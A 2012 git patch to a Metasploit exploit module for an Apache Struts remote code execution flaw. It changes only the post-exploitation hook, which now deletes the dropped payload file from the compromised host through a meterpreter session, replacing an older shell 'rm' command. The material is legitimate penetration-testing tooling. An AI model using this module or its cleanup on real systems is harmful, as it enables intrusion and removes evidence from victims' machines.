From 02a5dff51f71a5930741bfbbddb09b4e6a9257fb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 11 Jun 2012 12:07:38 +0200 Subject: [PATCH] struts_code_exec_exception_delegator_on_new_session: on_new_session modified --- .../struts_code_exec_exception_delegator.rb | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb index ad013800aa..cd732eb105 100644 --- a/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb +++ b/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb @@ -167,13 +167,24 @@ class Metasploit3 < Msf::Exploit::Remote end def on_new_session(client) - if target['Platform'] == 'linux' - print_status("Deleting #{@payload_exe} payload file") - execute_command("/bin/sh@-c@rm #{@payload_exe}") - else - print_status("Windows does not allow running executables to be deleted") - print_status("Delete the #{@payload_exe} file manually after migrating") + + if client.type != "meterpreter" + print_error("Please use a meterpreter payload in order to automatically cleanup.") + print_error("The #{@payload_exe} file must be removed manually.") + return end + + client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") + + if client.sys.config.sysinfo["OS"] =~ /Windows/ + print_error("Windows does not allow running executables to be deleted") + print_error("The #{@payload_exe} file must be removed manually after migrating") + return + end + + print_status("Deleting the #{@payload_exe} file") + client.fs.file.rm(@payload_exe) + end def exploit